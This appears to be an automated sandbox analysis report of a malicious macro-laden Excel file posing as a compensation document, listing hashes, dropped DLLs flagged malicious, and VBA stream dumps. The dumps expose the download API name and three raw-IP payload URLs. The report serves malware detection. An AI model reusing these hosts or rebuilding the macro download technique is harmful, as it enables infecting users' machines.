      SHA-256:309BE4CD584F9D0695E0AA9C23267FB6F0423B4FDEF25206013861848F0CC25F
      SHA-512:79B6E4F115568CE3D20340C4E1353DAE1189CC7C765A257F5F9F6B5248F79589B5C13AF1701359745B2E04C2151FCBFC12E7364CCCC501B710738232519A9897
      Malicious:false
      Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
      C:\Users\user\AppData\Local\Temp\VBE\RefEdit.exd
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):15676
      Entropy (8bit):4.533027176775501
      Encrypted:false
      SSDEEP:192:WLQxlA11DxzCOtHIT6P20eChgZjTdZ3HJV8L1I17EMBkDXrq9LwGGLVbkLde:WLQ38xesT20lheZ3waE5D7qxIxkxe
      MD5:5D875E34DEB2FB6764D59C36A6062310
      SHA1:EA3E3E00385E1D4D0D91614AFA63F800A082E4D5
      SHA-256:1F50C89EFA09339ADD45C4C2265DACC4743277B008D23EFBB6F48EE06D2B9837
      SHA-512:EC691FD8048A912E4DE1DEDCB3FF96F61599D8965C184E7ED71BA490D2A5EC5EC536853576FA9A4F943B65B03848E353407E6A2187A2A27E6973DA1D5B31E5D2
      Malicious:false
      Preview: MSFT................A...............................1............... ...................d...........,...................\...........H...4...........0... ...............................................................x...............................x.......................................................................................$"...............................................P..................................................$"..........................................0....P..,.........................0.....................%"..........................................H..."...................................................H.......(...................@...................P...............0.......`...............................p...X... ...............#M..v.K.~.x.............E.............F...........B........`..d......."E.............F........0..............F..........E........`.M...........CPf.........0..=.......01..)....w....<WI.......\.1Y........k...U........".......|...K..a...
      C:\Users\user\Drezd.red
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):1.6961804656486577
      Encrypted:false
      SSDEEP:1536:92VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:XC6MtAAFNJ5XC5SYCi02r+J
      MD5:B19B0AF9A01DD936D091C291B19696C8
      SHA1:862ED0B9586729F2633670CCD7D075D7693908E1
      SHA-256:17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330
      SHA-512:9F0CE65AFA00919797A3A75308CF49366D5DCA0C17EA3CFAB70A9E9244E0D5AB6DEC21A3A46C2C609159E0CBF91AF4F10E6A36F3FB7310A5C2B062249AB43DB4
      Malicious:true
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
      C:\Users\user\Drezd1.red
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):1.6961804656486577
      Encrypted:false
      SSDEEP:1536:92VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:XC6MtAAFNJ5XC5SYCi02r+J
      MD5:B19B0AF9A01DD936D091C291B19696C8
      SHA1:862ED0B9586729F2633670CCD7D075D7693908E1
      SHA-256:17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330
      SHA-512:9F0CE65AFA00919797A3A75308CF49366D5DCA0C17EA3CFAB70A9E9244E0D5AB6DEC21A3A46C2C609159E0CBF91AF4F10E6A36F3FB7310A5C2B062249AB43DB4
      Malicious:true
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
      C:\Users\user\Drezd2.red
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):1.6961804656486577
      Encrypted:false
      SSDEEP:1536:92VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:XC6MtAAFNJ5XC5SYCi02r+J
      MD5:B19B0AF9A01DD936D091C291B19696C8
      SHA1:862ED0B9586729F2633670CCD7D075D7693908E1
      SHA-256:17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330
      SHA-512:9F0CE65AFA00919797A3A75308CF49366D5DCA0C17EA3CFAB70A9E9244E0D5AB6DEC21A3A46C2C609159E0CBF91AF4F10E6A36F3FB7310A5C2B062249AB43DB4
      Malicious:true
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................

      Static File Info

      General

      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Mon Sep 27 10:38:52 2021, Security: 0
      Entropy (8bit):7.131912306364678
      TrID:
      • Microsoft Excel sheet (30009/1) 47.99%
      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
      File name:Compensation-1730406737-09272021.xls
      File size:129024
      MD5:b4b3a2223765ac84c9b1b05dbf7c6503
      SHA1:57bc35cb0c7a9ac6e7fcb5dea5c211fe5eda5fe0
      SHA256:3982ae3e61a6ba86d61bd8f017f6238cc9afeb08b785010d686716e8415b6a36
      SHA512:52b33c60f4f3b1043915fc595aaf1684fe558d82c778a8cb078916daa565f36f12d5fe023ea7611c39f0e2c48bb241eb481b02b2160ba4e97f402c9b75cae500
      SSDEEP:3072:Cik3hOdsylKlgxopeiBNhZFGzE+cL2kdAnc6YehWfG+tUHKGDbpmsiilBti2JtqV:vk3hOdsylKlgxopeiBNhZF+E+W2kdAnE
      File Content Preview:........................>.......................................................b..............................................................................................................................................................................

      File Icon

      Icon Hash:e4eea286a4b4bcb4

      Static OLE Info

      General

      Document Type:OLE
      Number of OLE Files:1

      OLE File "Compensation-1730406737-09272021.xls"

      Indicators

      Has Summary Info:True
      Application Name:Microsoft Excel
      Encrypted Document:False
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:True
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:True

      Summary

      Code Page:1251
      Author:Test
      Last Saved By:Test
      Create Time:2015-06-05 18:17:20
      Last Saved Time:2021-09-27 09:38:52
      Creating Application:Microsoft Excel
      Security:0

      Document Summary

      Document Code Page:1251
      Thumbnail Scaling Desired:False
      Company:
      Contains Dirty Links:False
      Shared Document:False
      Changed Hyperlinks:False
      Application Version:1048576

      Streams with VBA

      VBA File Name: UserForm2, Stream Size: -1
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2
      VBA File Name:UserForm2
      Stream Size:-1
      Data ASCII:
      Data Raw:
      VBA Code
      VBA File Name: Module5, Stream Size: 4241
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Module5
      VBA File Name:Module5
      Stream Size:4241
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 03 f0 00 00 00 a2 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff d0 03 00 00 9c 0d 00 00 00 00 00 00 01 00 00 00 fb 18 e3 25 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      VBA File Name: Sheet1, Stream Size: 991
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
      VBA File Name:Sheet1
      Stream Size:991
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . 9 . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 fb 18 b4 39 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      VBA File Name: ThisWorkbook, Stream Size: 2501
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
      VBA File Name:ThisWorkbook
      Stream Size:2501
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r S . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 82 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 89 04 00 00 a9 07 00 00 00 00 00 00 01 00 00 00 fb 18 72 53 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      VBA File Name: UserForm2, Stream Size: 1182
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/UserForm2
      VBA File Name:UserForm2
      Stream Size:1182
      Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 fb 18 b2 4a 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code

      Streams

      Stream Path: \x1CompObj, File Type: data, Stream Size: 108
      General
      Stream Path:\x1CompObj
      File Type:data
      Stream Size:108
      Entropy:4.18849998853
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
      General
      Stream Path:\x5DocumentSummaryInformation
      File Type:data
      Stream Size:244
      Entropy:2.65175227267
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
      General
      Stream Path:\x5SummaryInformation
      File Type:data
      Stream Size:208
      Entropy:3.33231709703
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . . 6 { . . . . . . . . . . . .
      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 101831
      General
      Stream Path:Workbook
      File Type:Applesoft BASIC program data, first line number 16
      Stream Size:101831
      Entropy:7.65479066874
      Base64 Encoded:True
      Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @
      Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 54 65 73 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
      Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 662
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECT
      File Type:ASCII text, with CRLF line terminators
      Stream Size:662
      Entropy:5.27592988154
      Base64 Encoded:True
      Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . M o d u l e = M o d u l e 5 . . B a s e C l a s s = U s e r F o r m 2 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t
      Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37
      Stream Path: _VBA_PROJECT_CUR/PROJECTlk, File Type: dBase IV DBT, blocks size 0, block length 17920, next free block index 65537, Stream Size: 30
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECTlk
      File Type:dBase IV DBT, blocks size 0, block length 17920, next free block index 65537
      Stream Size:30
      Entropy:1.37215976263
      Base64 Encoded:False
      Data ASCII:. . . . . . " E . . . . . . . . . . . . . F . . . . . . . .
      Data Raw:01 00 01 00 00 00 22 45 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 116
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
      File Type:data
      Stream Size:116
      Entropy:3.43722878834
      Base64 Encoded:False
      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 5 . M . o . d . u . l . e . 5 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . . .
      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 35 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 35 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2/\x1CompObj
      File Type:data
      Stream Size:97
      Entropy:3.61064918306
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 302
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2/\x3VBFrame
      File Type:ASCII text, with CRLF line terminators
      Stream Size:302
      Entropy:4.65399600072
      Base64 Encoded:True
      Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
      Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69
      Stream Path: _VBA_PROJECT_CUR/UserForm2/f, File Type: data, Stream Size: 226
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2/f
      File Type:data
      Stream Size:226
      Entropy:3.01175231218
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 ) . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 2 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . . . . . . . . .
      Data Raw:00 04 20 00 08 0c 00 0c 0a 00 00 00 10 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 b4 00 00 00 00 84 01 6c 00 00 28 00 f5 01 00 00 06 00 00 80 07 00 00 00 32 00 00 00 48 00 00 00 00 00 15 00 4c 61 62 65 6c 31 29 00 d4 00 00 00 d4 00 00 00 00 00 28 00 f5 01 00 00 06 00 00 80 08 00 00 00 32 00 00 00 38 00 00 00 01 00 15 00 4c 61 62 65 6c 32
      Stream Path: _VBA_PROJECT_CUR/UserForm2/o, File Type: data, Stream Size: 272
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2/o
      File Type:data
      Stream Size:272
      Entropy:3.6318384866
      Base64 Encoded:True
      Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 7 8 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . u R l M o n . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 1 8 3 . 9 6 . 6 7 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 2 5 0 . 1 4 8 . 2 1 3 / . . . . . . . . . . . . . 5 . . . . . . .
      Data Raw:00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 30 2e 31 34 2e 33 37 2e 31 37 38 2f 01 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00 00 02 18 00 28 00 00 00 06 00 00 80 75 52 6c 4d 6f 6e 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4332
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
      File Type:data
      Stream Size:4332
      Entropy:4.42025024054
      Base64 Encoded:False
      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
      Data Raw:cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2461
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
      File Type:data
      Stream Size:2461
      Entropy:3.4974013905
      Base64 Encoded:False
      Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ P . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . 3 . . d . A
      Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 03 00 00 00 00 00 01 00 02 00 03 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 138
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
      File Type:data
      Stream Size:138
      Entropy:1.48462480805
      Base64 Encoded:False
      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 6a 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 264
